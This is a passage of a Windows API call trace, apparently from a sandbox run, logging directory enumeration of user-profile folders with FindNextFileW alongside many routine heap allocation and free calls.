nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.718] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 1 [0090.718] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31758b8 [0090.718] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x3175990 [0090.718] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x3175b40 [0090.718] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3175990 | out: hHeap=0x680000) returned 1 [0090.718] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31758b8 | out: hHeap=0x680000) returned 1 [0090.718] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 1 [0090.718] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x315efb0 [0090.718] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x315f100 [0090.718] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x315f560 [0090.718] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x315f100 | out: hHeap=0x680000) returned 1 [0090.718] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x315efb0 | out: hHeap=0x680000) returned 1 [0090.718] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x62fa4a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="Default", cAlternateFileName="")) returned 1 [0090.718] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x315efb0 [0090.718] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x315f100 [0090.718] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x315f4b8 [0090.718] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x315f100 | out: hHeap=0x680000) returned 1 [0090.718] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x315efb0 | out: hHeap=0x680000) returned 1 [0090.718] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Default User", cAlternateFileName="DEFAUL~1")) returned 1 [0090.718] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x315efb0 [0090.718] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x315f100 [0090.718] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3e28 [0090.718] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x315f100 | out: hHeap=0x680000) returned 1 [0090.718] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x315efb0 | out: hHeap=0x680000) returned 1 [0090.718] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x286e4016, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x286e4016, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0090.718] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Public", cAlternateFileName="")) returned 1 [0090.719] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef1a8 [0090.719] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x315efb0 [0090.719] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef1a8 | out: hHeap=0x680000) returned 1 [0090.719] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x315f100 [0090.719] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x498) returned 0x31be978 [0090.719] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef1a8 [0090.719] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef4c8 [0090.719] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef9f0 [0090.719] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7c0 [0090.719] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef040 [0090.719] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef338 [0090.719] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0090.719] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0090.719] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0090.719] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0090.719] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef310 [0090.719] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efb30 [0090.719] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef00 [0090.719] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef388 [0090.719] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef130 [0090.719] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efab8 [0090.719] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eefc8 [0090.719] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef540 [0090.719] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efcc0 [0090.719] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef888 [0090.719] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2e8 [0090.719] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efa40 [0090.719] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efae0 [0090.719] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efce8 [0090.719] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31758b8 [0090.719] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3d48 [0090.719] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3df0 [0090.719] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3e98 [0090.719] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efa18 | out: hHeap=0x680000) returned 1 [0090.719] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc70 | out: hHeap=0x680000) returned 1 [0090.719] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef720 | out: hHeap=0x680000) returned 1 [0090.720] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eee88 | out: hHeap=0x680000) returned 1 [0090.720] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef478 | out: hHeap=0x680000) returned 1 [0090.720] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef3b0 | out: hHeap=0x680000) returned 1 [0090.720] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef4f0 | out: hHeap=0x680000) returned 1 [0090.720] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef658 | out: hHeap=0x680000) returned 1 [0090.720] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef068 | out: hHeap=0x680000) returned 1 [0090.720] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef748 | out: hHeap=0x680000) returned 1 [0090.720] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efb80 | out: hHeap=0x680000) returned 1 [0090.720] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eee10 | out: hHeap=0x680000) returned 1 [0090.720] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef6a8 | out: hHeap=0x680000) returned 1 [0090.720] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef838 | out: hHeap=0x680000) returned 1 [0090.720] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eefa0 | out: hHeap=0x680000) returned 1 [0090.720] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef5e0 | out: hHeap=0x680000) returned 1 [0090.720] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efb58 | out: hHeap=0x680000) returned 1 [0090.720] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efbd0 | out: hHeap=0x680000) returned 1 [0090.720] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efa68 | out: hHeap=0x680000) returned 1 [0090.720] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef3d8 | out: hHeap=0x680000) returned 1 [0090.720] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef770 | out: hHeap=0x680000) returned 1 [0090.720] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef8b0 | out: hHeap=0x680000) returned 1 [0090.720] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef950 | out: hHeap=0x680000) returned 1 [0090.720] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef158 | out: hHeap=0x680000) returned 1 [0090.720] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3175b40 | out: hHeap=0x680000) returned 1 [0090.720] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x315f560 | out: hHeap=0x680000) returned 1 [0090.720] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x315f4b8 | out: hHeap=0x680000) returned 1 [0090.720] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3e28 | out: hHeap=0x680000) returned 1 [0090.720] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce460 | out: hHeap=0x680000) returned 1 [0090.720] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3e28 [0090.720] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x315f100 | out: hHeap=0x680000) returned 1 [0090.720] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x315efb0 | out: hHeap=0x680000) returned 1 [0090.720] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Public", cAlternateFileName="")) returned 0 [0090.720] FindClose (in: hFindFile=0x6bdca8 | out: hFindFile=0x6bdca8) returned 1 [0090.720] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef9c8 | out: hHeap=0x680000) returned 1 [0090.721] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef9c8 [0090.721] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0090.721] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef158 [0090.721] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.721] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.721] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef158 | out: hHeap=0x680000) returned 1 [0090.721] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef158 [0090.721] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.721] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.721] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef158 | out: hHeap=0x680000) returned 1 [0090.721] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef158 [0090.721] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.721] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.721] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef158 | out: hHeap=0x680000) returned 1 [0090.721] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef158 [0090.721] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.721] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.721] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef158 | out: hHeap=0x680000) returned 1 [0090.721] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef158 [0090.721] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.721] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.721] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef158 | out: hHeap=0x680000) returned 1 [0090.721] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef158 [0090.721] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0090.721] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.721] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef158 | out: hHeap=0x680000) returned 1 [0090.721] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef158 [0090.721] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.721] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99e3968 [0090.721] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.721] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.721] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef158 | out: hHeap=0x680000) returned 1 [0090.721] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef158 [0090.721] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.721] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.721] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef158 | out: hHeap=0x680000) returned 1 [0090.721] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef158 [0090.722] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0090.722] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.722] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef158 | out: hHeap=0x680000) returned 1 [0090.722] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef158 [0090.722] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0090.722] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.722] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef158 | out: hHeap=0x680000) returned 1 [0090.722] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef158 [0090.722] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0090.722] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.722] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef158 | out: hHeap=0x680000) returned 1 [0090.722] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef158 [0090.722] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.722] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.722] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef158 | out: hHeap=0x680000) returned 1 [0090.722] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef9c8 | out: hHeap=0x680000) returned 1 [0090.722] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x315f368 | out: hHeap=0x680000) returned 1 [0090.722] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef810 | out: hHeap=0x680000) returned 1 [0090.722] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef518 | out: hHeap=0x680000) returned 1 [0090.722] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3175870 | out: hHeap=0x680000) returned 1 [0090.722] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efa90 | out: hHeap=0x680000) returned 1 [0090.722] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef248 | out: hHeap=0x680000) returned 1 [0090.722] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x315f170 | out: hHeap=0x680000) returned 1 [0090.722] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x315f2f8 | out: hHeap=0x680000) returned 1 [0090.722] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef8d8 | out: hHeap=0x680000) returned 1 [0090.722] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef1d0 | out: hHeap=0x680000) returned 1 [0090.722] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3175828 | out: hHeap=0x680000) returned 1 [0090.722] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.722] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.722] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef28 | out: hHeap=0x680000) returned 1 [0090.722] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3165e90 | out: hHeap=0x680000) returned 1 [0090.722] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef28 [0090.723] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0090.723] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.723] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.723] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.723] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.723] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.723] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.723] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.723] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.723] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.723] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.723] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.723] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.723] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.723] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.723] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.723] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.723] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.723] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.723] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.723] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.723] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.723] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0090.723] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.723] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.723] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.723] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.723] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99e3968 [0090.723] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.723] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.723] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.723] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.723] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.723] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.724] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.724] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.724] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0090.724] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.724] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.724] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.724] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0090.724] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.724] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.724] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.724] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0090.724] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.724] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.724] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.724] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.724] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.724] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.724] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.724] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.724] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.724] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: 